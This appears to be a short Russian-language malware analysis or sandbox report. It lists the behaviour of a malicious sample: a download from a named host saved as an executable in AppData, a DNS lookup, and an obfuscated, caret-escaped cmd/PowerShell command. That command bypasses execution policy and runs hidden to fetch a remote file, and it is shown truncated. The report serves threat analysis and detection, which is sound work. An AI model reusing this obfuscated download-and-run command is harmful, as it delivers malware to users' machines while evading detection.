Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^er^SHe^lL.^eXE -e^XeCu^TiONpOl^i^Cy b^YpA^s^S^ ^-N^O^PROF^I^Le -w^IndOwS^TyLE^ ^h^iDd^e^n (n^eW-ObJEC^t ^Sy^S^t^Em.net.W^ebc^LiE^N^t)^.^D^OWNL^OaDf^I^LE^('http://sun2u.top/se...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "poW^er^SHe^lL.^eXE -e^XeCu^TiONpOl^i^Cy b^YpA^s^S^ ^-N^O^PROF^I^Le -w^IndOwS^TyLE^ ^h^iDd^e^n (n^eW-ObJEC^t ^Sy^S^t^Em.net.W^ebc^LiE^N^t)^.^D^OWNL^OaDf^I^LE^('http://sun2u.top/se...' (со скрытым окном)